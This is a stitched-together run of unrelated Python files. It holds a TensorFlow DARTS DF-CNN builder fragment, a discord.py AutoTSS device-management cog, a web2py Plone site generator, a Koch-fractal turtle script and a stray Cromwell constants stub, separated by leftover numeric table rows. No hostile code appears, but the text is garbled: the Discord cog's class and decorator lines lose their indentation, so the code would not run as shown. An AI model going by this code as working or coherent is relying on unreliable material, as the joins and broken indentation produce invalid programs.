            layer_tmp, KB_para_tmp, TS_para_tmp, cnn_TS_para_tmp, select_para_tmp = new_darts_dfcnn_layer(layer_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], dfcnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=dfcnn_TS_activation_fn, KB_param=KB_param_in, TS_param=TS_param_in, conv_param=cnn_TS_params[2*layer_cnt:2*(layer_cnt+1)], select_param=select_params[layer_cnt], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], trainable=trainable, skip_connect_input=processed_skip_connect_input, use_numpy_var_in_graph=use_numpy_var_in_graph)
            layers.append(layer_tmp)
            layers_for_skip.append(layer_tmp)
            dfcnn_shared_params_return = dfcnn_shared_params_return + KB_para_tmp
            dfcnn_TS_params_return = dfcnn_TS_params_return + TS_para_tmp
            cnn_TS_params_return = cnn_TS_params_return + cnn_TS_para_tmp
            select_params_return = select_params_return + select_para_tmp
            if layer_cnt == skip_connect_out:
                next_skip_connect = None
    #### flattening output
    if flat_output:
        output_dim = [int(layers[-1].shape[1]*layers[-1].shape[2]*layers[-1].shape[3])]
        layers.append(tf.reshape(layers[-1], [-1, output_dim[0]]))
    else:
        output_dim = layers[-1].shape[1:]
    #### add dropout layer
    if dropout:
        layers.append(tf.nn.dropout(layers[-1], dropout_prob))
    return (layers, dfcnn_shared_params_return, dfcnn_TS_params_return, cnn_TS_params_return, select_params_return, output_dim)
def new_darts_dfcnn_fc_net(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, dfcnn_KB_sizes, dfcnn_TS_sizes, dfcnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, dfcnn_TS_activation_fn=tf.nn.relu, fc_activation_fn=tf.nn.relu, dfcnn_KB_params=None, dfcnn_TS_params=None, cnn_TS_params=None, select_params=None, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, output_type=None, trainable=True, task_index=0, skip_connections=[], use_numpy_var_in_graph=False):
    """DARTS DF-CNN feature extractor followed by a fully-connected head.

    Builds the convolutional stack via new_darts_dfcnn_net (with flattened
    output) and feeds its final layer into new_fc_net.

    Returns:
        (all_layers, dfcnn_shared_params, dfcnn_TS_params, cnn_TS_params,
         select_params, fc_params)
    """
    ## convolutional part (flat_output=True so the FC head can consume it directly)
    conv_stack, shared_params_out, mapping_params_out, conv_TS_params_out, selection_params_out, _ = new_darts_dfcnn_net(net_input, k_sizes, ch_sizes, stride_sizes, dfcnn_KB_sizes, dfcnn_TS_sizes, dfcnn_TS_stride_sizes, activation_fn=cnn_activation_fn, dfcnn_TS_activation_fn=dfcnn_TS_activation_fn, dfcnn_KB_params=dfcnn_KB_params, dfcnn_TS_params=dfcnn_TS_params, cnn_TS_params=cnn_TS_params, select_params=select_params, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_sizes=pool_sizes, dropout=dropout, dropout_prob=dropout_prob, flat_output=True, trainable=trainable, task_index=task_index, skip_connections=skip_connections, use_numpy_var_in_graph=use_numpy_var_in_graph)
    ## fully-connected part on top of the flattened conv output
    fc_stack, fc_params_out = new_fc_net(conv_stack[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, use_numpy_var_in_graph=use_numpy_var_in_graph)
    return (conv_stack + fc_stack, shared_params_out, mapping_params_out, conv_TS_params_out, selection_params_out, fc_params_out)
| 76,894 | 30,880 |
from aioify import aioify
from discord.ext import commands
import aiofiles
import aiohttp
import aiosqlite
import asyncio
import discord
import json
import shutil
class Device(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.shutil = aioify(shutil, name='shutil')
self.utils = self.bot.get_cog('Utils')
@commands.group(name='device', invoke_without_command=True)
@commands.guild_only()
async def device_cmd(self, ctx: commands.Context) -> None:
prefix = await self.utils.get_prefix(ctx.guild.id)
embed = discord.Embed(title='Device Commands')
embed.add_field(name='Add a device', value=f'`{prefix}device add`', inline=False)
embed.add_field(name='Remove a device', value=f'`{prefix}device remove`', inline=False)
embed.add_field(name='List your devices', value=f'`{prefix}device list`', inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@device_cmd.command(name='add')
@commands.guild_only()
@commands.max_concurrency(1, per=commands.BucketType.user)
async def add_device(self, ctx: commands.Context) -> None:
    """Interactively collect a device's info and save it to the database.

    Walks the user through name, identifier, ECID and board config prompts,
    then optionally a custom generator and apnonce, validating each answer
    via the Utils cog before storing the device JSON in autotss.db.

    Fixes relative to the previous revision:
    - the device cap used ``>``, letting users reach ``max_devices + 1``
      devices; now ``>=`` so the cap is actually ``max_devices``.
    - the A12 apnonce re-prompt called ``check_apnonce`` without the ``cpid``
      argument (wrong arity on that path); it now matches the earlier
      ``check_apnonce(cpid, ...)`` call.
    """
    prefix = await self.utils.get_prefix(ctx.guild.id)
    timeout_embed = discord.Embed(title='Add Device', description='No response given in 1 minute, cancelling.')
    cancelled_embed = discord.Embed(title='Add Device', description='Cancelled.')
    for embed in (timeout_embed, cancelled_embed):
        embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))

    max_devices = 10  # TODO: Export this option to a separate config file

    async with aiosqlite.connect('Data/autotss.db') as db, db.execute('SELECT devices from autotss WHERE user = ?', (ctx.author.id,)) as cursor:
        try:
            devices = json.loads((await cursor.fetchone())[0])
        except TypeError:
            # No row for this user yet; create one with an empty device list.
            devices = list()
            await db.execute('INSERT INTO autotss(user, devices, enabled) VALUES(?,?,?)', (ctx.author.id, json.dumps(devices), True))
            await db.commit()

    # Error out once the cap is reached, unless invoked by the bot's owner.
    # FIX: was `len(devices) > max_devices`, which allowed max_devices + 1.
    if len(devices) >= max_devices and not await ctx.bot.is_owner(ctx.author):
        embed = discord.Embed(title='Error', description=f'You cannot add over {max_devices} devices to AutoTSS.')
        await ctx.send(embed=embed)
        return

    device = dict()
    async with aiohttp.ClientSession() as session:
        for x in range(4):  # Loop that gets all of the required information from the user
            descriptions = (
                'Enter a name for your device',
                "Enter your device's identifier (e.g. `iPhone6,1`)",
                "Enter your device's ECID (hex)",
                # Implicit concatenation keeps this prompt a single line.
                "Enter your device's Board Config (e.g. `n51ap`). "
                'This value ends in `ap`, and can be found with [System Info](https://arx8x.github.io/depictions/systeminfo.html) '
                'under the `Platform` section, or by running `gssc | grep HWModelStr` in a terminal on your iOS device.'
            )
            embed = discord.Embed(title='Add Device', description='\n'.join((descriptions[x], 'Type `cancel` to cancel.')))
            embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
            if x == 0:
                message = await ctx.send(embed=embed)
            else:
                await message.edit(embed=embed)

            # Wait for a response, erroring out after 1 minute of silence.
            try:
                response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
                if x == 0:
                    answer = response.content  # Don't make the device's name lowercase
                else:
                    answer = response.content.lower()
            except asyncio.exceptions.TimeoutError:
                await message.edit(embed=timeout_embed)
                return

            # Delete the user's reply to keep the channel tidy.
            try:
                await response.delete()
            except discord.errors.NotFound:
                pass

            if answer.lower() == 'cancel' or answer.startswith(prefix):
                await message.edit(embed=cancelled_embed)
                return

            # Make sure the given information is valid.
            if x == 0:
                device['name'] = answer
                name_check = await self.utils.check_name(device['name'], ctx.author.id)
                if name_check is not True:  # check_name returns True, 0 or -1
                    embed = discord.Embed(title='Error', description=f"Device name `{device['name']}` is not valid.")
                    if name_check == 0:
                        embed.description += " A device's name must be between 4 and 20 characters."
                    elif name_check == -1:
                        embed.description += " You cannot use a device's name more than once."
                    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
                    await message.edit(embed=embed)
                    return
            elif x == 1:
                device['identifier'] = 'P'.join(answer.split('p'))  # restore capitalization, e.g. 'iphone6,1' -> 'iPhone6,1'
                if await self.utils.check_identifier(session, device['identifier']) is False:
                    embed = discord.Embed(title='Error', description=f"Device Identifier `{device['identifier']}` is not valid.")
                    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
                    await message.edit(embed=embed)
                    return
            elif x == 2:
                device['ecid'] = answer[2:] if answer.startswith('0x') else answer
                ecid_check = await self.utils.check_ecid(device['ecid'], ctx.author.id)
                if ecid_check is not True:  # check_ecid returns True or -1 (or another falsy code)
                    embed = discord.Embed(title='Error', description=f"Device ECID `{device['ecid']}` is not valid.")
                    embed.set_footer(text=f'{ctx.author.display_name} | This message will be censored in 5 seconds to protect your ECID(s).', icon_url=ctx.author.avatar_url_as(static_format='png'))
                    if ecid_check == -1:
                        embed.description += ' This ECID has already been added to AutoTSS.'
                    await message.edit(embed=embed)
                    # Censor the ECID out of the error message after 5 seconds.
                    embed.description = embed.description.replace(f"`{device['ecid']}` ", '')
                    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
                    await asyncio.sleep(5)
                    await message.edit(embed=embed)
                    return
            else:
                device['boardconfig'] = answer
                if await self.utils.check_boardconfig(session, device['identifier'], device['boardconfig']) is False:
                    embed = discord.Embed(title='Error', description=f"Device boardconfig `{device['boardconfig']}` is not valid.")
                    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
                    await message.edit(embed=embed)
                    return

        cpid = await self.utils.get_cpid(session, device['identifier'], device['boardconfig'])

    # Ask the user if they'd like to save blobs with a custom generator.
    generator_description = [
        'Would you like to save blobs with a custom generator?',
        '*If being ran on A12+ devices, you **will** need to provide a matching apnonce for SHSH blobs to be saved correctly.*',
        'Guide for jailbroken A12+ devices: [Click here](https://ios.cfw.guide/tss-web#getting-generator-and-apnonce-jailbroken-a12-only)',
        'Guide for nonjailbroken A12+ devices: [Click here](https://ios.cfw.guide/tss-computer#get-your-device-specific-apnonce-and-generator)',
        'This value is hexadecimal, 16 characters long, and begins with `0x`.'
    ]
    embed = discord.Embed(title='Add Device', description='\n'.join(generator_description))
    embed.add_field(name='Options', value='Type **yes** to add a custom generator, **cancel** to cancel adding this device, or anything else to skip.', inline=False)
    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
    await message.edit(embed=embed)
    try:
        response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
        answer = response.content.lower()
    except asyncio.exceptions.TimeoutError:
        await message.edit(embed=timeout_embed)
        return
    try:
        await response.delete()
    except discord.errors.NotFound:
        pass

    if answer == 'yes':
        embed = discord.Embed(title='Add Device', description='Please enter the custom generator you wish to save blobs with.\nType `cancel` to cancel.')
        embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
        await message.edit(embed=embed)
        try:
            response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
            answer = response.content.lower()
        except asyncio.exceptions.TimeoutError:
            await message.edit(embed=timeout_embed)
            return
        try:
            await response.delete()
        except discord.errors.NotFound:
            pass
        if answer == 'cancel' or answer.startswith(prefix):
            await message.edit(embed=cancelled_embed)
            return
        else:
            device['generator'] = answer
            if await self.utils.check_generator(device['generator']) is False:
                embed = discord.Embed(title='Error', description=f"Device Generator `{device['generator']}` is not valid.")
                embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
                await message.edit(embed=embed)
                return
    elif answer == 'cancel' or answer.startswith(prefix):
        await message.edit(embed=cancelled_embed)
        return
    else:
        device['generator'] = None

    # Ask the user if they'd like to save blobs with a custom apnonce.
    apnonce_description = [
        'Would you like to save blobs with a custom apnonce?',
    ]
    if device['generator'] is not None:
        apnonce_description.append(f"This custom apnonce MUST match with your custom generator `{device['generator']}`, or else your SHSH blobs **will be invalid**.")
    if cpid >= 32800:  # 0x8020 (A12) and newer CPIDs
        if len(apnonce_description) == 2:  # a custom generator was given above
            a12_apnonce_desc = (
                'This also MUST be done for your device, or else your SHSH blobs **will be invalid**. More info '
                '[here](https://www.reddit.com/r/jailbreak/comments/f5wm6l/tutorial_repost_easiest_way_to_save_a12_blobs/).'
            )
        else:
            a12_apnonce_desc = (
                'This MUST be done for your device, or else your SHSH blobs **will be invalid**. More info '
                '[here](https://www.reddit.com/r/jailbreak/comments/f5wm6l/tutorial_repost_easiest_way_to_save_a12_blobs/).'
            )
        apnonce_description.append(a12_apnonce_desc)
        apnonce_description.append('NOTE: This is **NOT** the same as your **generator**, which is hex, begins with `0x`, and is 16 characters long.')
    embed = discord.Embed(title='Add Device', description='\n'.join(apnonce_description))
    embed.add_field(name='Options', value='Type **yes** to add a custom apnonce, **cancel** to cancel adding this device, or anything else to skip.', inline=False)
    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
    await message.edit(embed=embed)
    try:
        response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
        answer = response.content.lower()
    except asyncio.exceptions.TimeoutError:
        await message.edit(embed=timeout_embed)
        return
    try:
        await response.delete()
    except discord.errors.NotFound:
        pass

    if answer == 'yes':
        embed = discord.Embed(title='Add Device', description='Please enter the custom apnonce you wish to save blobs with.\nType `cancel` to cancel.')
        embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
        await message.edit(embed=embed)
        try:
            response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
            answer = response.content.lower()
        except asyncio.exceptions.TimeoutError:
            await message.edit(embed=timeout_embed)
            return
        try:
            await response.delete()
        except discord.errors.NotFound:
            pass
        if answer == 'cancel' or answer.startswith(prefix):
            await message.edit(embed=cancelled_embed)
            return
        else:
            device['apnonce'] = answer
            if await self.utils.check_apnonce(cpid, device['apnonce']) is False:
                embed = discord.Embed(title='Error', description=f"Device ApNonce `{device['apnonce']}` is not valid.")
                embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
                await message.edit(embed=embed)
                return
    elif answer == 'cancel' or answer.startswith(prefix):
        await message.edit(embed=cancelled_embed)
        return
    else:
        device['apnonce'] = None

    # 0x8020 <= cpid < 0x8900: A12+ device with no apnonce given — warn that blobs will be unusable.
    if 32800 <= cpid < 35072 and device['apnonce'] is None:
        embed = discord.Embed(title='Add Device')
        apnonce_warning = (
            'You are attempting to add an A12+ device while choosing to not specify a custom apnonce.',
            'This will save **non-working SHSH blobs**.',
            'Are you sure you want to do this?'
        )
        embed.add_field(name='Warning', value='\n'.join(apnonce_warning), inline=False)
        embed.add_field(name='Options', value='Type **yes** to go back and add a custom apnonce, **cancel** to cancel adding this device, or anything else to skip.', inline=False)
        embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
        await message.edit(embed=embed)
        try:
            response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
            answer = response.content.lower()
        except asyncio.exceptions.TimeoutError:
            await message.edit(embed=timeout_embed)
            return
        try:
            await response.delete()
        except discord.errors.NotFound:
            pass
        if answer == 'yes':
            embed = discord.Embed(title='Add Device', description='Please enter the custom apnonce you wish to save blobs with.\nType `cancel` to cancel.')
            embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
            await message.edit(embed=embed)
            try:
                response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
                answer = response.content.lower()
            except asyncio.exceptions.TimeoutError:
                await message.edit(embed=timeout_embed)
                return
            try:
                await response.delete()
            except discord.errors.NotFound:
                pass
            if answer == 'cancel' or answer.startswith(prefix):
                await message.edit(embed=cancelled_embed)
                return
            else:
                device['apnonce'] = answer
                # FIX: this call previously omitted `cpid` (check_apnonce(device['apnonce'])).
                if await self.utils.check_apnonce(cpid, device['apnonce']) is False:
                    embed = discord.Embed(title='Error', description=f"Device ApNonce `{device['apnonce']}` is not valid.")
                    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
                    await message.edit(embed=embed)
                    return
        elif answer == 'cancel' or answer.startswith(prefix):
            await message.edit(embed=cancelled_embed)
            return
        else:
            device['apnonce'] = None

    device['saved_blobs'] = list()

    # Add device information into the database.
    devices.append(device)
    async with aiosqlite.connect('Data/autotss.db') as db:
        await db.execute('UPDATE autotss SET devices = ? WHERE user = ?', (json.dumps(devices), ctx.author.id))
        await db.commit()

    embed = discord.Embed(title='Add Device', description=f"Device `{device['name']}` added successfully!")
    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
    await message.edit(embed=embed)
    await self.utils.update_device_count()
@device_cmd.command(name='remove')
@commands.guild_only()
@commands.max_concurrency(1, per=commands.BucketType.user)
async def remove_device(self, ctx: commands.Context) -> None:
    """Interactively remove one of the invoking user's devices.

    Shows a numbered device list, asks which to delete, confirms, backs up
    any saved blobs (DMing a download link when possible), then rewrites the
    user's device list in the database.

    Fixes relative to the previous revision:
    - the two bare ``except:`` clauses are narrowed (message deletion ->
      discord HTTP errors; number parsing -> ValueError).
    - on the DM-failure path the status message is deleted after 15 s; the
      final ``message.edit`` then raised NotFound and skipped
      ``update_device_count``. The edit is now skipped once the message is gone.
    """
    prefix = await self.utils.get_prefix(ctx.guild.id)
    cancelled_embed = discord.Embed(title='Remove Device', description='Cancelled.')
    invalid_embed = discord.Embed(title='Error', description='Invalid input given.')
    timeout_embed = discord.Embed(title='Remove Device', description='No response given in 1 minute, cancelling.')
    for x in (cancelled_embed, invalid_embed, timeout_embed):
        x.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))

    async with aiosqlite.connect('Data/autotss.db') as db, db.execute('SELECT devices from autotss WHERE user = ?', (ctx.author.id,)) as cursor:
        try:
            devices = json.loads((await cursor.fetchone())[0])
        except TypeError:
            devices = list()

    if len(devices) == 0:
        embed = discord.Embed(title='Error', description='You have no devices added to AutoTSS.')
        await ctx.send(embed=embed)
        return

    embed = discord.Embed(title='Remove Device', description="Choose the number of the device you'd like to remove.\nType `cancel` to cancel.")
    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
    for x in range(len(devices)):
        device_info = [
            f"Name: `{devices[x]['name']}`",
            f"Device Identifier: `{devices[x]['identifier']}`",
            f"Boardconfig: `{devices[x]['boardconfig']}`"
        ]
        if devices[x]['apnonce'] is not None:
            device_info.append(f"Custom ApNonce: `{devices[x]['apnonce']}`")
        embed.add_field(name=x + 1, value='\n'.join(device_info), inline=False)
    message = await ctx.send(embed=embed)

    try:
        response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
        answer = response.content.lower()
    except asyncio.exceptions.TimeoutError:
        await message.edit(embed=timeout_embed)
        return
    try:
        await response.delete()
    except discord.errors.HTTPException:  # FIX: was a bare except (covers 404 / missing permissions)
        pass

    if answer == 'cancel' or answer.startswith(prefix):
        await message.edit(embed=cancelled_embed)
        return
    try:
        num = int(answer) - 1
    except ValueError:  # FIX: was a bare except
        await message.edit(embed=invalid_embed)
        return
    if num not in range(len(devices)):
        await message.edit(embed=invalid_embed)
        return

    embed = discord.Embed(title='Remove Device', description=f"Are you **absolutely sure** you want to delete `{devices[num]['name']}`?")
    embed.add_field(name='Options', value='Type **yes** to delete your device & blobs from AutoTSS, or anything else to cancel.', inline=False)
    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
    await message.edit(embed=embed)
    try:
        response = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
        answer = response.content.lower()
    except asyncio.exceptions.TimeoutError:
        await message.edit(embed=timeout_embed)
        return
    try:
        await response.delete()
    except discord.errors.NotFound:
        pass

    if answer != 'yes':
        await message.edit(embed=cancelled_embed)
        return

    embed = discord.Embed(title='Remove Device', description='Removing device...')
    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
    await message.edit(embed=embed)

    message_deleted = False
    async with aiofiles.tempfile.TemporaryDirectory() as tmpdir:
        url = await self.utils.backup_blobs(tmpdir, devices[num]['ecid'])
        if url is None:  # no saved blobs to hand back; just confirm removal
            embed = discord.Embed(title='Remove Device', description=f"Device `{devices[num]['name']}` removed.")
            embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
            await message.edit(embed=embed)
        else:
            # NOTE(review): presumably an async shutil wrapper stored on the cog — confirm in __init__.
            await self.shutil.rmtree(f"Data/Blobs/{devices[num]['ecid']}")
            embed = discord.Embed(title='Remove Device')
            embed.description = f"Blobs from `{devices[num]['name']}`: [Click here]({url})"
            embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
            try:
                await ctx.author.send(embed=embed)
                embed.description = f"Device `{devices[num]['name']}` removed."
                await message.edit(embed=embed)
            except discord.errors.HTTPException:  # DM failed (e.g. DMs disabled): post in channel, then self-destruct
                embed.description = f"Device `{devices[num]['name']}` removed.\nBlobs from `{devices[num]['name']}`: [Click here]({url})"
                embed.set_footer(
                    text=f'{ctx.author.display_name} | This message will automatically be deleted in 15 seconds to protect your ECID(s).',
                    icon_url=ctx.author.avatar_url_as(static_format='png')
                )
                await message.edit(embed=embed)
                await asyncio.sleep(15)
                await ctx.message.delete()
                await message.delete()
                message_deleted = True

    devices.pop(num)
    async with aiosqlite.connect('Data/autotss.db') as db:
        await db.execute('UPDATE autotss SET devices = ? WHERE user = ?', (json.dumps(devices), ctx.author.id))
        await db.commit()
    if not message_deleted:  # FIX: previously edited even after the message was deleted
        await message.edit(embed=embed)
    await self.utils.update_device_count()
@device_cmd.command(name='list')
@commands.guild_only()
async def list_devices(self, ctx: commands.Context) -> None:
    """List the invoking user's devices, censoring ECIDs after 10 seconds."""
    async with aiosqlite.connect('Data/autotss.db') as db, db.execute('SELECT devices from autotss WHERE user = ?', (ctx.author.id,)) as cursor:
        try:
            devices = json.loads((await cursor.fetchone())[0])
        except TypeError:
            devices = list()

    if len(devices) == 0:
        embed = discord.Embed(title='Error', description='You have no devices added to AutoTSS.')
        await ctx.send(embed=embed)
        return

    embed = discord.Embed(title=f"{ctx.author.display_name}'s Devices")
    for device in devices:
        lines = [
            f"Device Identifier: `{device['identifier']}`",
            f"ECID: ||`{device['ecid']}`||",
            f"Boardconfig: `{device['boardconfig']}`"
        ]
        for key, label in (('generator', 'Custom generator'), ('apnonce', 'Custom ApNonce')):
            if device[key] is not None:
                lines.append(f"{label}: `{device[key]}`")
        embed.add_field(name=f"`{device['name']}`", value='\n'.join(lines), inline=False)
    embed.set_footer(text=f'{ctx.author.display_name} | This message will be censored in 10 seconds to protect your ECID(s).', icon_url=ctx.author.avatar_url_as(static_format='png'))
    message = await ctx.send(embed=embed)

    # After a grace period, strip the ECID line out of every field.
    await asyncio.sleep(10)
    for idx, field in enumerate(embed.fields):
        kept_lines = [line for line in field.value.split('\n') if 'ECID' not in line]
        embed.set_field_at(index=idx, name=field.name, value='\n'.join(kept_lines), inline=False)
    embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
    await message.edit(embed=embed)
def setup(bot):
    # discord.py extension entry point: called by bot.load_extension to register this cog.
    bot.add_cog(Device(bot))
| 22,303 | 8,444 |
### SITE PLONE
import os, sys
import xml.etree.cElementTree as tree_element_first
@auth.requires_membership('admin')
def add():
    """Generate the skeleton for a Plone site (admin-only web2py action).

    Creates sites/prodam.gerenciador.<site>/src/prodam/gerenciador/<site>/
    with profiles/, browser/viewlets/templates subtrees and their config
    files. The site name is read from ``request.post_vars.site``.

    Fixes relative to the previous revision:
    - the bare ``except:`` (which hid any bug, including NameErrors) now
      catches filesystem errors only.
    - ``0755`` octals rewritten as ``0o755`` (same value, valid on
      Python 2.6+ and 3.x).
    """
    if request.post_vars.site:
        site = request.post_vars.site
        folders = ['sites', '/viewlets', '/browser', '/src', '/templates']
        try:
            project_name = "prodam.gerenciador." + str(site)
            path = folders[0] + "/" + str(project_name)
            os.mkdir(path, 0o755)  # Plone site root
            path += folders[3]
            os.mkdir(path, 0o755)  # src directory
            # one nested directory per dotted component of the project name
            for directory in project_name.split("."):
                path += "/" + directory
                os.mkdir(path, 0o755)
            # profiles
            profiles = path
            os.mkdir(profiles + "/profiles", 0o755)
            os.mkdir(profiles + "/profiles/default/", 0o755)
            add_profile_file(path)
            # browser
            path += folders[2]
            os.mkdir(path, 0o755)
            # viewlets
            path += folders[1]
            os.mkdir(path, 0o755)
            add_configure_file(path, project_name)  # zcml file
            add_viewlets_file(path)  # python configure file
            # templates
            path += folders[4]
            os.mkdir(path, 0o755)
            add_template_file(path)  # pt file
        except (OSError, IOError):  # FIX: was a bare except hiding unrelated errors
            raise HTTP(500, T('Ocorreu um erro...'))
    else:
        site = None
    lista = os.listdir("sites/")
    return dict(lista=lista, site=site)
def add_configure_file(path, project_name, param1='IPortalHeader', param2='IProdamPortal'):
    """Write browser/configure.zcml registering the Plone logo viewlet."""
    # Root node carrying the namespace declarations.
    configure = tree_element_first.Element('configure')
    for attr, value in (
        ('xmlns', 'http://namespaces.zope.org/zope'),
        ('xmlns:browser', 'http://namespaces.zope.org/browser'),
        ('i18n_domain', 'prodam.portal'),
    ):
        configure.set(attr, value)
    # Plone viewlet registration node.
    viewlet = tree_element_first.SubElement(configure, "browser:viewlet")
    for attr, value in (
        ("name", "plone.logo"),
        ("manager", "plone.app.layout.viewlets.interfaces." + param1),
        ("class", ".logo.LogoViewlet"),
        ("permission", "zope2.View"),
        ("layer", project_name + ".interfaces." + param2),
    ):
        viewlet.set(attr, value)
    indent(configure)
    tree_element_first.ElementTree(configure).write(path + "/configure.zcml", encoding="utf-8")
def add_template_file(path):
    """Copy the alerta.pt template component into *path*.

    Reads sites/components/alerta.pt (relative to the cwd) and appends its
    contents to <path>/alerta.pt.

    FIX: both file handles were opened without ever being closed (and the
    output handle shadowed the builtin ``file``); use context managers.
    """
    with open('sites/components/alerta.pt', 'r') as source:
        text = source.read()
    with open(path + "/" + "alerta.pt", "a+") as target:
        target.write(text)
def add_profile_file(path):
    """Write the GenericSetup viewlet profile (profiles/default/viewlets.xml)."""
    # A single empty <object/> root node is all the profile needs.
    root = tree_element_first.Element('object')
    indent(root)
    tree_element_first.ElementTree(root).write(path + "/profiles/default/viewlets.xml", encoding="utf-8")
def add_viewlets_file(path):
    """Create an empty viewlets.py in *path* (append mode: existing content kept).

    FIX: the handle was opened without a ``with`` block and shadowed the
    builtin ``file``; use a context manager so it is always closed.
    """
    with open(path + "/" + "viewlets.py", "a+"):
        pass
def indent(elem, level=0):
    """Recursively add whitespace to *elem* so ElementTree writes pretty XML.

    Mutates text/tail attributes in place; only whitespace-only values are
    overwritten.
    """
    pad = "\n" + level * " "
    if len(elem):
        # Parent with children: indent its text, its own tail, then recurse.
        if not elem.text or not elem.text.strip():
            elem.text = pad + " "
        if not elem.tail or not elem.tail.strip():
            elem.tail = pad
        for child in elem:
            indent(child, level + 1)
        # Last child's tail closes the parent back at this level.
        if not child.tail or not child.tail.strip():
            child.tail = pad
    else:
        if level and (not elem.tail or not elem.tail.strip()):
            elem.tail = pad
def testando():
    """Debug action: return every t_tbl_components row (web2py globals)."""
    return dict(users=db(db.t_tbl_components).select())
import turtle
class fraktalKocha(turtle.Turtle):
    """Turtle that draws Koch curves and Koch snowflakes."""

    def __init__(self):
        # Hidden classic-shaped turtle; visibility off keeps drawing fast.
        super().__init__(shape='classic', visible=False)

    def krzywaKocha(self, d, n):
        """Draw an order-*n* Koch curve of total length *d*."""
        self.pendown()
        if n == 0:
            self.forward(d)
        else:
            segment = d / 3
            # Four sub-curves separated by turns of +60, -120, +60 degrees
            # (left(-120) is the same heading change as right(120)).
            for turn in (60, -120, 60):
                self.krzywaKocha(segment, n - 1)
                self.left(turn)
            self.krzywaKocha(segment, n - 1)
        self.penup()

    def platekKocha(self, d, n):
        """Draw an order-*n* Koch snowflake: three curves joined by 120° right turns."""
        for _ in range(3):
            self.krzywaKocha(d, n)
            self.right(120)
kolory = ('#ffbd20', '#20bd20', '#ff3c00', '#f000ff', '#004aff')
xPlatek = (-400, -400, 200, 200, -100)
yPlatek = (-50, 250, 250, -50, 150)

f = fraktalKocha()
turtle.title('Krzywa Kocha')
f.home()
f.speed(0)  # 0..10 — 0 is the fastest
f.penup()
f.pensize(2)
f.clear()

# Legend: one coloured "n = <order>" label per curve order.
for n, kolor in enumerate(kolory):
    f.pencolor(kolor)
    f.goto(-450 + (turtle.window_width() // 5) * n, -380)
    f.write('n = ', True, align="left", font=("Arial", 12, "normal"))
    f.write(n, True, align="left", font=("Arial", 12, "normal"))
f.goto(-480, -350)

# Overlaid Koch curves of increasing order.
for n, kolor in enumerate(kolory):
    f.pencolor(kolor)
    f.krzywaKocha(turtle.window_width() // 5, n)

# Koch snowflakes of increasing order at fixed positions.
for n, (kolor, x, y) in enumerate(zip(kolory, xPlatek, yPlatek)):
    f.pencolor(kolor)
    f.goto(x, y)
    f.platekKocha(200, n)
# NOTE(review): string constants that appear to name per-call timing-metadata
# fields for Cromwell workflow calls and Google Pipelines API ("PAPI")
# operations — confirm against the code that consumes them.
Attempt = "attempt"
# Cromwell-side timings.
